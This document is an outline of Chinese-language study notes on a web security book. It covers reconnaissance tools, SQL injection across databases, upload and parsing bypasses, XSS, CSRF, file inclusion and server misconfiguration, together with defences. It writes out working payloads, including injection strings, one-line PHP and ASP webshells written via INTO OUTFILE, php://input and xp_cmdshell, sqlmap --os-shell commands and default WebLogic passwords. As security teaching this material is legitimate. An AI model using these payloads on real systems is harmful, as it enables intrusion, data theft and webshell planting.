《Web安全深度剖析》

时间：2020-10-30 11:51:38 来源：蒲公英阅读网 本文已影响人

相关热词搜索：剖析 深度 Web

　《Web安全深度剖析》 ● 简介、HTTP协议、抓包不再赘述略 ● 信息探测与收集

　● Google Hack （baidu 等爬虫）

　● 搜索子域名，示例：【site:baidu.com】

　 ● 搜集 Web 信息 ● Google常用语法

　● 【site 】：指定域名 ● 【ntext 】：正文中存在关键字的网页 ● 【intitle 】：标题中存在关键字的网页 ● 【inurl 】：url中存在关键字的网页 ● 【info 】：一些基本信息 ● 【filetype 】：搜索指定文件类型 ● 案例一：【intitle:管理登录 filetype:php】

　● 查询网页标题中含有【管理登录】且为【php 类型】的网站（后台或指定类型的目标扫描）

　● 案例二：【intext:Power by Discuz】

　● Discuz搭建的论坛正文里基本都有个 Power by Discuz（熟悉 CMS 特征），配合最新的Disxuz漏洞危害严重。

　● google的局限性，robots.txt，所以有时候需要自己写爬虫来获取某些信息

　● 防御：

　● Nmap （扫描）

　● 简介：window图形界面的：Zenmap；命令行和 kali下的差不多，略 ● 参数

　● 案例：-Pn：将所有主机视为在线——跳过主机发现

　 ● Nmap 脚本引擎 ● .nse脚本 ，Script目录下，--script=脚本名称

　 ● 官方脚本文档：nmap.org/nsedoc

　 ● 案例 ● 案例一：扫描 Web 敏感目录【http-enum.nse】

　● -p 80 --script=http-enum.nse

　 ● 案例二：扫描 SqlInjection【http-sql-injection.nse】

　● -p 80 --script=http-sql-injection.nse ● 案例三：使用所有的脚本进行扫描【--script all】，最好保存为文档-oN ● 案例四：使用通配符选择多个脚本扫描 ● nmap --script "http-*" 127.0.0.1，注意脚本名称用双引号避免 shell误解

　● 还可以漏洞检测和密码暴力破解，更多参考 https://nmap.org/book/nse-usage.html，包括基本用法和脚本分类等

　● DirBuster （目录、隐藏文件扫描）

　● 简介

　● kali自带

　 ● 概览：

　● 使用案例以及基本步骤：

　● 爆破目录，也有爬虫功能

　● 类似功能的工具还有 【WWWScan 】【御剑后台扫描珍藏版】等 ● 需要 递归式的扫描， 拿着扫描结果进一步地扫描

　● 针对性扫描

　● 指纹识别

　● 简介：最重要的就是特征库

　● 工具 ● Nmap：

　● 【nmap -O】：操作系统指纹

　● 【Nmap -A/sV】：端口服务版本等详细信息 ● 【御剑指纹识别】：可快速识别国内的一些主流 CMS（仅限国内）

　● 【AppPrint】：Web容器指纹识别工具，可针对单个 IP、域名或 IP段进行 Tomcat、WebLogic、WebSphere、IIS 等 Web 容器识别

　 ● kali自带的【whatweb】【httprint】等 Web 服务器指纹识别工具等 ● 在线指纹识别的网站：【云悉、shodan】等 ● 浏览器插件【Wapplyzer】等 ● 经验：

　● 指纹伪造（少见）

　● 子域名爆破

　● lijiejie、layer挖掘机等 ● 漏洞扫描

　● 概述：

　● 概览

　● Burp Suite

　● 各个模块：

　● 【Proxy】：代理模块，数据包拦截

　 ● 【Target】：站点地图，Filter 过滤，Scope目标范围，Issue definitions 问题的定义

　 ● 基本使用方法：

　 ● 【Spider】：爬虫，默认被动进行漏洞扫描，高版本没有。proxy抓包 send to spider

　● 基本使用方法：

　 ● 【Scanner】：扫描漏洞

　● 基本使用方法：

　● 【intruder】：入侵模块，自动化攻击、爆破等。Attack type，程序变量，字典设置等。

　● 基本使用方法：

　 ● 【Repeater】：重放模块，拦截到的包 send to repeater，修改后“Go”发送请求，Response区域显示响应

　● 【Decoder】：解码模块 ● 基本使用方法：解码、编码、hash、智能解码

　● 【Comparer】：比较模块 ● 基本使用方法：

　 ● 其他小问题：

　● 中文乱码：User Options调成中文字体即可

　● 恢复默认选项

　● 使用插件：独立运行或者 BP 中添加或安装

　 ● AWVS （Acunetix）

　）

　● 自动化 Web漏洞扫描工具

　● 10 以及以下为客户端，10 以上为 web ● AWVS超详细中文手册：https://blog.csdn.net/madao1o_o/article/details/88548681】

　 ● 基本使用方法（版本不同差别不大）：

　● 基本的一次扫描（web scanner）

　 ● Web 端扫描服务

　● 创建扫描

　 ● AWVS小工具

　 ● AppScan

　● 简介

　 ● 基本使用方法 ● 界面：

　 ● AppScan 的全面扫描：探索和测试

　● 示例：

　● 处理结果

　● AppScan 辅助工具：可以在菜单栏”工具“→”PowerTool“中找到

　 ● 其他

　● 不要过分依赖工具，重在积累经验

　● 漏洞原理篇

　● SQL 注入漏洞

　● SQLi 原理

　● 用户的输入数据被 SQL解释器执行 ● 形式：【闭合+攻击者的 SQL语句+注释】

　● 经典实例：【" or 1=1 --】

　● 需要推测后端程序源码的闭合方式，使 SQL语句提前闭合，并能执行自己的 SQL语句，注释掉或闭合后面的多余代码 ● 注入漏洞分类

　● 概览

　● 数字型注入 ● 判断 ● 【"】

　引号处报错 ● 【1=1】正常【1=2】错误，页面存在布尔状态 ● 常见于弱类型语言，自动推导变量类型

　 ● 字符型注入 ● 关键：如何闭合 SQL语句，注释多余的代码

　 ● 判断 ● 常见的闭合方式（需要推测后端代码）：【"】【"】【")】

　● 常见的注释方式（数据库或脚本语言决定）：【-- 】【#】

　● 示例：

　● select查询：【" and 1=1 -- 】

　● update更新（例如 SQL Server 重置密码等）：【"+(select @@version)+"】

　● insert同 update ● SQL 注入的其他分类 ● 按出现的位置 ● Cookie、POST等 ● 按反馈形式 ● 盲注（根据页面布尔状态）、延时（根据延时）等 ● 到了数据库都可被归纳为【数字型】和【字符型】

　 ● 常见数据库注入

　● 概览：

　● SQL Server

　● 利用 错误信息提取信息 ● 对于用户不应该像对开发者一样【反馈详细的报错信息】

　● 枚举当前 表及列：【 【group by 】【"having 1=1 -- 】

　● 利用数据类型错误 提取数据：

　● 【"and 1 > (select top 1 username from users ) 】

　● 【"and 1 > (select top 1 username from users where username not in("root") ) 】

　● 【"and 1 = convert(int , (select top 1 username from users) )】

　● 【"and 1 = convert(int ,(select stuff((select ","+users.username,"|"+users.password from users for xml path("")),1,1,"")))】

　● 获取 元数据 ● 元数据库【INFORMATION_SCHEMA】

　● 【INFORMATION_SCHEMA.TABLES 】视图：表 ● 【INFORMATION_SCHEMA.COLUMNS】

　视图：字段 ● 取得当前数据库表 ● 【select table_name from information_schema.tables 】

　● 取得 Student表字段 ● 【select column_name from information_schema.columns where table_name="Student" 】

　● 常见视图

　● Order by 子句（通用）

　● 【order by N】,按第 N 列排序，当第 N 列不存在时报错，可判断列数

　● UNION 查询（通用）

　● 基本规则：

　● 列数相同 ● 数据类型兼容 ● 探测字段（列）数 ：【union select null,null,null】

　● 三列：【union select null,"x",null from sysobject where xtype="U" 】

　● 示例：

　 ● 无辜的 （系统）函数 ● 系统函数和常用函数

　● 危险的 存储过程 ● 常见的危险存储过程

　 ● 角色与权限

　● 动态执行 ● exec()，十六进制绕过防火墙过滤

　● Mysql（ （ ※ ）

　● 基本思路同 SQL Server，语法存在差异。如：SQL Server：@@version；mysql：version()。

　● Mysql中的 注释 ● 【#】【-- 】【/**/】【/*! */】

　● 获取 元数据 ● 【INFORMATION_SCHEMA】信息数据库 ● 查询数据库名称 ● 【select SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA 】

　● 查询当前数据库表 ● 【select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=(select DATABASE()) 】

　● 查询指定表的所有字段 ● 【select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ="Student" 】

　● 案例：【limit 0,1】【linit 1】

　● UNION 查询

　● 差别：【Oracle】需要加【表名】，【SQL Server】和【Oracle】数据类型不确定时使用【null】

　● Mysql 函数利用 ● 常用函数

　● 【 load_file() 】：读取文件

　● 十六进制绕过、char强制类型转换绕过、hex 解决乱码问题

　● 【 into outfile 】：写文件

　● 【 连接字符串 】：

　● 【 concat() 】：

　● 【concat_ws()】

　● 【 load_file() 】：读取文件 ● 权限

　● Mysql 显错式注入 ● 【updatexml 】【extractvalue 】【floor 】

　● 【updatexml 】

　● 【and updatexml(1,(concat(0x7c,(select @@version))),1)】

　● 【extractvalue 】

　● 【and extractvalue(1,concat(0x7c,(select user())))】

　● 【floor 】

　● 【union select * from(select count(*),concat(floor(rand(0)*2,(select user()))a from information_schema.tables group by a)b】

　● 宽字节注入 ● 编码不统一导致的，gbk 编码为双字节编码 8140-FEFE ● 【\】是【5c】【%df5c】就构成了一个汉字从而绕过了转义，df可以换为 81-FE之间的，让 magic_quotes_gpc的转义反斜杠\参与构成了一个 GBK 编码的汉字，从而使后面的单引号或双引号之类的注入生效，https://mubu.com/doc/3ikGy9mE_Wr

　 ● Mysql 长字符截断

　● 配置问题：mysql的设置中【sql_mode:default】

　● 示例：

　 ● 延时注入

　● 基于时间差异的盲注

　● 【and sleep(3)】

　● 思路：【length()】【hex(mid(target,L,1))】，通过延时判断假设的表达式的真假，来一点点地猜解

　● Oracle

　● 获取 元数据 ● 【user_tablespaces】视图：查看表空间 ● 【select tablespace_name from user_tablespaces】

　● 【user_tables】视图：查看当前用户的所有表 ● 【select table_name from user_tables where rownum = 1】

　● 【user_tab_columns】视图：查看当前用户的所有列，例如查看 user表的所有列 ● 【select column_name from user_tab_columns where table_name= "users"】

　● 【all_users】视图：查看 Oracle数据库的所有用户 ● 【select username from all_users】

　● 【user_objects】视图：查看当前用户的所有对象（表名称、约束、索引）

　● 【select object_name from user_objects】

　● UNION 查询 ● 【order by 】【union select null,null,null from dual 】

　 ● 获取敏感信息

　● 获取数据库表以及其内容

　 ● Oracle中 包的概念 ● 简介

　 ● 页面不能直接回显，反弹数据

　● 写文件

　 ● 读文件

　● 执行系统命令 ● 第一步：创建 Java 执行代码包

　● 第二步：赋予用户 Java 执行权限

　 ● 第三步：创建函数，调用 Java 代码 ● 第四步：执行命令

　● 常见包

　 ● 注入工具

　● 概览

　● SQLMap

　● 简介

　●

　● 基本使用 ● 【-u "URL"】：判断是否存在注入点 ● 【-u "URL" --dbs 】：获取数据库 ● 【-u "URL" --current-db】：当前数据库（假设为 cdb）

　● 【-u "URL" -D cdb --tables】：列出 cdb数据库的所有表 ● 【-u "URL" -D cdb -T table1 --columns】：列出 cdb数据库的 table1表中的所有字段 ● 【-u "URL" -D "cdb" -T "table1" -C "user,passwd,emails" --dump 】：获得指定字在 段的内容，除了回显，还会保存在 SQLMap/output/ 目录下，名为 “ 表名.cvs” ● 常用参数 ● 测试注入点权限：【--privileges】

　● 【sqlmap -u [URL] --privileges】

　 //测试所有用户的权限 ● 【sqlmap -u [URL] --privileges -U sa】

　 //测试 sa用户权限 ● 执行 Shell命令：【--os-cmd】

　● 【sqlmap -u [URL] --os-cmd="net user"】

　//执行 net user命令 ● 【sqlmap -u [URL] --os-shell 】

　 //系统交互的 shell ● 执行 SQL命令：【--sql-shell 】

　● 【sqlmap -u [URL] --sql-shell 】

　//返回 SQL交互的 shell，可以执行 SQL语句 ● 【sqlmap -u [URL] --sql-query="sql"】

　● POST提交方式：【--data "POST 参数"】

　● 显示信息的详细（程度）等级：【-v 0-6】

　● 【sqlmap -u [URL] --dbs -v 1】

　● -v 参数包含以下 7 个等级 ● 【0】：只显示 python的回溯、错误和关键消息 ● 【1】：显示信息和警告消息 ● 【2】：显示调试消息 ● 【3】：有效载荷注入 ● 【4】：显示 HTTP 请求 ● 【5】：显示 HTTP 响应头 ● 【6】：显示 HTTP 响应页面的内容 ● 注入 HTTP 请求：【-r head.txt】

　● 【sqlmap -r head.txt --dbs】

　 //head.txt内容为 HTTP 请求，例如 BP的抓包 ● 直接连接到数据库 ● 【sqlmap -d "mysql://admin:admin@192.168.1.8:3306/testdb" --dbs】

　● 注入等级：【--level】

　● 【sqlmap -u [URL] --level 3】

　● 【1】：默认 ● 【2】：cookie会被测试 ● 【3】：user-agent/referer 会被测试

　● 【5】：包含的 payload 最多，会自动破解出 cookie、XFF等头部注入，但速度也会很慢。

　● 【-p】指定想要测试的参数：-p "id,user-agent" ● 【--skip=""】：level很大但有个别参数不想测试的时候使用--skip来跳过：--skip "user-agent.referer" ● 将注入语句插入到指定位置：【*】

　● 【sqlmap -u "http://www.test.com/id/2*.html" --dbs】

　● 使用 SQLMap 插件：【-tamper】//插件都保存在 sqlmap/tamper 下，这些插件通常用来绕过 WAF（web应用防火墙）

　● 【sqlmap -u [URL] -tamper "space2morehash.py"】

　● 其他常用参数 ● 参考：https://github.com/sqlmapproject/sqlmap/wiki/Usage ● 常用参数以及说明

　 ● 【】

　● 【】

　● 【】

　● 【sqlmap -u [URL] --data "POST参数"】

　● Pangolin

　● 穿山甲，略 ● Havij

　● 自动化 sql注入软件，略 ● 止 防止 SQL 注入

　● 概览：

　● 数据类型判断、特殊字符转义

　● 严格的数据类型 ● 数字型注入：Java、C#等强类型语言几乎可以忽略；PHP、ASP 需要 is_numeric()、ctype_digit()等函数判断数据类型

　● 特殊字符转义 ● 还有黑白名单策略，对特殊字符整理成黑名单，统一进行转义等过滤操作。

　● 二次注入攻击：利用第一次过滤后的正常输入来闭合第二次的 sql语句

　 ● 使用预编译语句 ● JAVA：prepareStatement、setter，动态拼接 sql语句就没用了

　● 框架技术 ● 对象关系映射 ORM注入、HQL注入， 动态拼接就可能会存在注入

　 ● 改进代码：【?】【setParameter(0,id)】；【:id】【setParameter("id",id)】

　● 存储过程 ● exec、动态拼接等依然会造成 SQL注入。

　● 小结 ● 先工具，后手工辅助。代码规范形成模板。

　● 上传漏洞

　● 概述 ● Web 应用允许上传文件，没有做严格验证或过滤

　● 解析漏洞

　上传漏洞常与 Web 容器的解析漏洞配合使用。

　常见的 Web 容器：IIS、Apache、Nginx、Tomcat等

　● IIS 解析漏洞 ● IIS 6.0 ● 【.asa 】【.asp 】文件夹下的任意文件都会当作 asp 文件解析 ● 【.asp;1.jpg 】文件也会以 ASP脚本执行

　● WebDav

　● 开启后，如果支持 PUT、Move、Copy、Delete等方法

　 ● 测试步骤如下：

　● 【OPTIONS】探测 HTTP方法

　● 【PUT】上传脚本文件（一句话木马等）

　● 【Move】或【Copy】改名，至此，获取 webshell

　● 【DELETE】还可以删除服务器上的任意文件

　 ● WebDav漏洞检测工具：【IIS Write】

　● Apache 解析漏洞 ● 扩展名从后向前知道遇到认识的解析，【/conf/mime.type】下记录有 Apache 认识的扩展名

　 ● 可以绕过黑名单【1.php.rar】

　● PHP CGI 解析漏洞 ● 【/1.jpg/1.php】:1.jpg被当作 php脚本来解析，通用：【/1.jpg/XXX.php】

　● PHP配置文件中的 【cgi.fi : x_pathinfo】

　选项默认开启，造成 PHP向前的递归解析 ● 常见于 Nginx+PHP ● 绕过上传漏洞

　● 概述 ● 客户端。服务端检测，菜刀（蚁剑）和一句话木马。

　 ● 中国菜刀、Edjpgcom

　 ● 客户端检测 ● 概述 ● JS客户端验证，约等于无，可以通过各种方法轻易绕过。上传文件的处理：php脚本控制，将临时目录中的上传文件，重命名，放到指定目录下，如 move_uploaded等处理。

　● 绕过方法 ● 使用 FireBug，已经淘汰，使用 Firefox Developer Editor 即可

　● 【F12】打开开发者工具：操作方法相同。在保证身份认证通过的情况下，对请求页面做出自己的修改来绕过客户端检测

　 ● 中间人 BP ● 先正常通过客户端验证，再 BP截获客户端请求进行非法修改，就绕过了客户端验证。

　● 服务器端检测 ● 概述 ● 黑白名单、文件类型、文件重命名。注意解析漏洞。

　 ● 黑白名单策略 ● 黑名单过滤

　● 绕过方法

　● 白名单过滤

　 ● 绕过方法

　● MIME 验证 ● 概述 ● MIME(多用途互联网邮件扩展类型)，指定某种扩展名文件的打开方式

　● 示例 ● 简单的一个 jpg 类型判断，md5 文件名重命名，再 move_uploaded_file将上传文件移到指定目录

　 ● 绕过：BP拦截，修改 Content-Type也就是 MIME类型即可

　● 目录验证 ● 上传文件的保存路径在前端暴露，参数可控，利用解析漏洞，将文件夹名称改为.asp，则 IIS 6.0其下的所有文件都会被解析为 asp 文件，包括木马。

　 ● 示例：

　● 截断上传攻击 ● 【%00】：00截断，ASP、PHP、JSP等均存在，以 asp 为例

　● 示例：

　● 存在 00 截断漏洞的典型的 ASP代码

　● BP拦截请求

　● BP 修改文件名为 1.asp 空格 xxx.jpg，HEX 模式下将空格 20 改为 00，即可截断。绕过了文件类型验证，最后得到的还是 asp 脚本文件

　 ● 文本编辑器上传漏洞

　● 概述 ● 富文本编辑器：品类繁多，功能丰富，漏洞危害范围大。

　● 敏感信息暴露 ● 富文本编辑器的目录往往存在一些敏感文件，没有处理干净就会被攻击者获取敏感信息，详情可查看各自的官网手册等

　● 黑名单策略错误 ● 过滤不干净

　● 任意文件上传漏洞 ● 示例：

　● upload.php，只看第一块验证阶段即可

　● config.php 中记录的格式配置为：发现没有 Media，这意味着可以上传任意类型文件，（绕过了 Type检测，count(……)>0 为假，故可以上传任意类型文件)

　● 利用

　● 其他漏洞：可查阅对应的漏洞库

　● 修复上传漏洞

　● 【目录过滤】【文件重命名】

　● 没有绝对的安全

　● 小结 ● 路径验证、随机重命名

　● XSS 漏洞

　● 简介 ● 用户使用浏览器访问被嵌入恶意代码的页面时，恶意代码将会在用户浏览器上执行。

　● XSS 原理解析

　● 概述

　● 示例：JS、挂在外部恶意脚本、无视扩展名只要包含 JS代码就会执行

　 ● XSS 类型

　● 反射型 XSS ● 概述

　● 示例：在用户登陆的情况（包含各种身份认证等敏感信息）下，诱使用户点击自己构造的还有恶意 JS代码的连接（短链、自己搭建的服务器等），恶意代码沉默式执行（功能很多，如获取当前登录的 cookie等敏感信息并发送给攻击者，攻击者就可以劫持会话，以被害者的身份登录，被害者是管理员将直接获取网站的管理权：创建隐蔽用户、上传webshell等）。

　 ● 存储型 XSS ● 概述

　● 示例 ● 查看【输出点】，构造 闭合使 XSS语句生效

　● 【显示标签】，FUZZ

　 ● DOM XSS ● 概述 ● 【DOM】、一切都是节点、节点树

　● 示例：应该是+8，length("content=")=8

　 ● 测 检测 XSS

　手工精准，工作量大；软件自动化方便，但存在误报和漏报。

　● 手工检测 XSS

　● 可得知输出位置时 ● 需要判断输入和输出做了哪些转义和过滤

　● 无法得知输出位置时 ● 构造一些模糊测试来根据特殊的反馈（管理员封禁，管理员的 cookie发送过来了之类的）来测试后台页面构造

　● 全自动检测 XSS ● XSStrike（github）、XSSER（github）、XSSF等工具，http://www.domxssscanner.com/ （失效）等网站

　● XSS 高级利用

　● 危害 ● 盗取用户 Cookie ● 修改网页内容 ● 网站挂马 ● 利用网站重定向 ● XSS蠕虫 ● XSS 会话劫持 ● Cookie 简介 ● 用途、存储位置、数量和大小限制

　● Cookie 格式 ● 保存位置可通过 IE浏览器查看

　 ● 示例：

　 ● 【Cookie格式】

　和 【标准的 Cookie变量】

　如下：

　● 读写 Cookie ● 示例：

　 ● 观察 cookie：服务器端发送的 Set-Cookie，客户端后续请求时的 Cookie字段

　 ● Javascript 操作 Cookie

　● 身份认证信息被截获，用户会话被劫持。BP proxy模块 options→Match and Replace，为请求头添加正则和替换

　 ● 浏览器控制台【document.cookie=""】来设置或覆盖 cookie

　 ● 注意：身份验证不止有 Cookie还有很多别的临时信息，很多时候光拿到 cookie完成不了身份和会话的劫持 ● SESSION ● 概念：服务器端、SESSIONID

　● 示例：拿到 SESSIONID，在会话结束前同样能会话劫持

　● XSS Framework

　● XSS漏洞利用框架

　● XSS Platform，https://xsspt.com/index.php，参考：https://mubu.com/doc/2Stf67wOwxr ● 创建项目、配置模块

　● 得到测试代码、利用方式

　● 插入并等待

　● 得到 cookie

　 ● XSS GetShell ● 案例：DeDeCMS ● 提交数据到 feedback_ajax.php，拦截 HTTP请求

　● 源代码审计：隐藏的没有过滤的 title变量

　 ● 添加 title请求

　● 造成 XSS

　 ● 利用 XSS构造写入 shell文件的请求，沉默式触发这个请求的方式常用【form 表单自动提交】【JavaScript 的 AJAX 技术】

　● 【构造 HTML 自动提交表单】

　● 示例：

　 ● 【AJAX 发送 POST 请求】

　● 构造 AJAX 请求文件

　● 小马被管理员不知情地创建，getshell

　 ● XSS 蠕虫 ● 概述

　● 示例：两个请求链接：关注自己、转发本条微博（需获取用户 id，AJAX）。最后效果：一点开链接就会转发并关注，其他人也是如此。

　● 复 修复 XSS 跨站漏洞

　● 输入与输出 ● 转义特殊字符

　● PHP：

　● 【htmlspecialchars()】【htmlentities()】

　 ● Java: ● Jsoup.clean(XXX, Whilelist.basic());

　● Whilelist代码如下：

　 ● OWASP ESAPI：

　● XSS可能发生的场景：

　 ● 编码器 ● HTML编码

　 ● CSS编码

　 ● Javascript编码

　●

　● HttpOnly ● 概述：cookie仅用于 http，不能用 JS获取

　 ● 命令执行漏洞

　攻击者可以随意执行系统命令，B/S、C/S 均存在

　● OS 命令执行漏洞示例

　● DVWA

　●

　 ● 命令执行模型（模式/ 方式）

　● 代码执行：脚本执行 OS命令；OS命令执行：直接调用系统命令

　 ● PHP 命令执行 ● 实例一：命令执行，system()

　● 实例二：代码执行，eval()

　● 实例三：动态函数调用，$fun($para)

　● 实例四：PHP函数代码执行漏洞

　● Java 命令执行 ● Runtime.getRuntime().exec(命令)

　 ● 框架执行漏洞

　● Struts2 代码执行漏洞 ● Structs2 < 2.2.0

　 ● Structs 2.0.0~2.3.15

　● ThinkPHP 命令执行漏洞 ● preg_replace 的 /e参数

　● 防范命令执行漏洞

　● 不使用系统执行命令、过滤、动态函数使用指定函数、不用不可控的危险函数

　● 文件包含漏洞

　● 概述 ● 重用性高代码文件，包含，动态包含，PHP 居多

　● 包含漏洞原理解析

　● PHP 包含 ● include、include_once、require、require_once

　 ● 文件包含 示例：

　● 本地文件包含 Local File Include （LFI ）

　● 两个简单的本地包含示例

　 ● 无所谓扩展名，被包含文件中的 PHP 内容会被 PHP 解析，非 PHP 内容会暴露源码。

　 ● 远程文件包含 Remote File Include （RFI ）

　● php.ini 开启 allow_url_include。除了使用 URL包含文件，其他一样。

　● 文件包含 漏洞示例：

　●

　包含不存在的文件时报错会暴露敏感信息：网站绝对路径等

　 ● 文件包含 利用 ● 读取敏感文件 ● 常见的敏感文件路径

　● 远程包含 shell ● 远程文件能够生成一句话木马

　 ● 本地包含配合文件上传 ● 文件上传能够生成一句话木马的图片，文件包含这个图片

　● 使用 PHP 封装协议 ● PHP支持的协议和封装协议：https://www.php.net/manual/zh/wrappers.php

　● 使用封装协议读取 PHP 文件 ● 【php://filter/read=convert.base64-encode/resource=config.php】

　 ● 写入 PHP 文件 ● 【allow_url_include=On】，【php://input】，如【<?fputs(fopen("shell.php","w"),"<?php eval($_POST["xxser"]);?>")?>】

　● 包含 Apache 日志文件 ● 存在文件包含漏洞，但没有文件上传等切入点时，可以利用【Apache 日志文件 件】：

　● 【access.log （访问日志）】和【error.log （错误日志）】

　 ●

　● 截断包含 ● 背景，【%00 】截断

　● 【./././././././././././././…… 】截断

　 ● 绕过 WAF 防火墙 ● 文件包含一句话木马图片绕过 WAF检测

　● JSP 包含 ● 静态包含 ● include 为静态包含：只允许包含一个已经存在与服务器中的文件，不能使用变量来控制包含，不存在文件包含漏洞

　● 动态包含 ● jsp:include：非 JPS文件扩展名的 JSP内容不会被解析

　● Servlet

　 ● Servlet包含

　 ● java中 URL的跳转分为两类：

　● 客户端跳转 ● 重定向，response.sendRedirect()或者 JS

　● 服务器端跳转 ● ResponseDispatcher 接口的 forword方法，暴露 web.xml

　●

　● 安全编写包含

　● 其他漏洞

　● CSRF

　● 简介

　 ● CSRF 原理 ● 利用用户登录状态，欺骗用户做用户不知情地合法请求

　● CSRF 攻击场景 ● （GET ）

　● 微博 CSRF蠕虫攻击，诱惑性链接、自动化收听并转发，类似 XSS蠕虫。

　● CSRF攻击是黑客借助受害者的 Cookie骗取服务器的信任，但是黑客不能也不用获取到 Cookie。只是诱导用户自己不自觉地做出了一次正常请求。CSRF所能做的就是给服务器发送请求。

　● （POST ）

　● 构造 form表单并自动提交即可

　● 静默请求：AJAX、隐藏 fiframe并指定表单的 target等

　 ● 浏览器 Cookie 机制（策略）

　● 本地 Cookie（持久性 Cookie），设置了 Expire 字段，存储在 本地 ● 临时 Cookie（Session Cookie），没有设置了 Expire字段，存储在 浏览器内存中， 浏览器关闭，Session Cookie 也消失 ● 示例：

　● 不同浏览器机制不同，IE比较特殊。

　● 检测 CSRF 漏洞 ● 手工检测 ● 确定 Web 应用的所有功能 ● 确定敏感操作 ● 拦截 HTTP 请求，确定参数意义 ● CSRF POC

　● 如下

　● 半自动检测 ● CSRFTester ● 基本检测流程

　 ● 生成的 form表单如下

　 ● BP

　● 拦截，engagement tools 生成

　CSRF POC

　 ● 全自动误报率大（略）

　● 预防 CSRF ● 二次确认 ● Token（令牌）认证 ● token

　● 使用 token防御 CSRF

　● XSS 和 CSRF ● XSS > CSRF

　 ● 逻辑错误漏洞

　● 概述

　● 挖掘逻辑漏洞 ● 重点：【业务流程】、【HTTP/HTTPS请求篡改】

　● 绕过授权验证 ● 水平越权 ● 定义：

　● 示例：修改对应 ID的密码，当 ID 用户可控（例如 BP拦截修改），则可修改任意用户的密码。

　● 防护：加入二次验证

　● 垂直越权 ● 定义：不同级别、不同角色之间的越权 ● 分为 向上越权 和 向下越权

　● 示例：向上越权为例 ● 同一张表

　● 不同表，过滤器中直接取出管理员信息即可 ● Java 的 Filter 过滤器

　=

　Struts2 拦截器 ● 密码找回逻辑漏洞 ● 客户端暴露了敏感参数

　● 支付逻辑漏洞 ● 商品数量为负数 ● 代码略，当商品数为负时，钱会增多，商家的商品也会增加。

　 ● 0 元购买商品 ● 不正确的异常处理 ● 其他：商品价格修改、物流运费修改等 ● Fuzz Testing：模糊测试 ● 指定账户恶意攻击 ● 如：得知指定账户的信息后利用系统正常功能：登录失败 X 次冻结，来恶意封锁用户账号 ● 代码注入

　● 分类 ● OWASP 分类 ● OS命令执行 ● 文件包含 ● 动态函数调用 ● 代码执行 ● Wikipedia 分类 ● SQL注入、XML注入、XSS、文件包含、命令执行等 ● XML 注入 ● 与 XSS类似，关键：

　闭合 XML 标签 ● XML注入的两大要素：标签闭合和获取 XML结构 ● 示例：就会增加一个 hack的管理员账号

　 ● 修复：预定义字符转义

　● XPath 注入 ● XPath 基础语法

　● XML、XPath、SQL注入的方式类似

　● JSON 注入 ● 基础概念

　 ● 注入，防御：转义

　● HTTP 参数污染（HTTP Parameter Pollution ，HPP ）

　● HPP后，根据脚本语言和环境的不同，取值也不同

　● HPP常用来绕过一些 WAF：WAF取值可能会选择第一项参数值，而取值脚本与 WAF选择不同，则有可能绕过 WAF数据验证

　● URL 跳转与钓鱼

　● URL 跳转 ● 客户端跳转

　● 又称 URL重定向，URL会有明显变化，如：response.sendRedirect("x.jsp");

　● 服务器端跳转 ● 又称 URL转发，用户浏览器地址栏的 URL不会变化

　● 其他跳转 ● 直接向服务器发送请求，如<a>标签：

　<a href = "http://www.xxx.com/news.jsp">新闻列表</a> ● 钓鱼

　● 简介

　● 利用 URL跳转来躲过检测

　● URL跳转漏洞，也称 URL重定向漏洞

　● PHP、ASP、ASP.NET等脚本语言都有类似的代码进行重定向。如 PHP：

　● XSS漏洞也可以跳转 ● 案例：

　 ● WebServer 远程部署

　● 属于 配置性错误漏洞

　● Tomcat （8080 ）

　● 初始配置并不安全

　● 攻击过程 ● 制作 WAR格式的 Shell程序

　● WAR文件部署

　● 防御

　 ● JBoss （8080 ）

　● 默认无需密码即可登录后台管理，没有密码认证 ● 部署 WAR包过程 ● 【JMX Console】

　● 【jboos.deployment】【flavor=URL，type=DeploymentScanner】

　● 【WAR文件的下载地址 URL】【addURL】【Invoke】

　● 【部署成功】，但是临时文件，服务器重启后文件消失 ● 利用：

　● 由于默认没有密码认证策略，所以攻击者常常通过 Google Hack 来批量获取Webshell ● 防御：管理员必须将 JBoss的 jmx-console密码认证开启，或者删除 jmx-console ● WebLogic （7001 ）

　● 默认的后台管理界面：/console/login/loginForm.jsp ● 存在密码验证策略，密码要求严格 ● 老版本的弱口令，账密为（可交叉使用）：

　● Weblogic ● system ● portaladmin ● guest ● 部署 WAR包 getshell

　● 实战篇

　● 实战入侵与防范

　● 开源程序安全剖析

　● 0day 攻击 ● 概念

　● 利用：【google hack采集+自动化批量化 EXP】与 漏洞信息库

　● 【代码审计】：seay、cobra等。

　【FUZZ】

　● 网站后台安全 ● 后台脆弱性原因 ● 模板 ● wordpress：外观、编辑、模板，编辑 404.php模板加入一句话木马，连接即可

　 ● 文件编辑中的【源码暴露（没有限制文件读取目录）】和【任意保存】

　● 文件管理 ● 与模块获取 Webshell类似

　● 执行 SQL 语句 ● 数据库用户权限较大，攻击者就可以 SQL语句到处 WebShell ● 示例：mysql+phpmyadmin，向数据库中插入一句话木马再导出到硬盘中，【select "<?php @eval($_POST[cmd])?>" INTO OUTFILE "F:/php/htdocs/phpMyadmin/x.php"】

　● 数据库常用的导出语句如下：

　● Access ● 常规：

　● 简短：

　● 【SELECT "代码" into [Excel 5.0;HDR=YES;DATABASE=c:\test.asp;1.xls].["xxx"] from 表】

　● 【SELECT "<%execute request(chr(35))%>" into [xxser] in "c:\e.asp;xls" "excel 5.0" from 表】

　● 注意：

　● SQL Server ● Xp_cmdShell：【exec master..xp_cmdshell "echo ^<%eval request("chopper")%^> >c:\111.txt "】

　 ● Oracle ●

　 ●

　● 网站备份 ● 示例：

　● 上传图片木马，将图片木马备份至.asp 或.asa等脚本格式，getshell ● MD5 还安全吗 ● MD5 密文 32伪，16 位 MD5 为第 8-24位的值 ● 破解方法：

　● 彩虹表 ● 针对各种组合预先算好哈希值的集合 ● 主流算法都有对应的彩虹表 ● 体积往往非常大 ● 性能高，辅以 NVidia CUDA 技术和 NTLM算法 ● 获取途径：网络下载、工具生成：RainbowCrack、Cain 等 ● MD5 破解站点 ● 常用

　 ● 防范：修改加密算法，二次 MD5也不安全、研究新的加密算法等

　● 拖库

　● 导出数据库中的数据、社工库，导出操作：外连接、本地

　 ● 支持外连接 ● 数据库密码，【ASP.NET】、【PHP】、【JSP】的配置文件

　● 示例：Navicat软件拖库，转存数据方式：

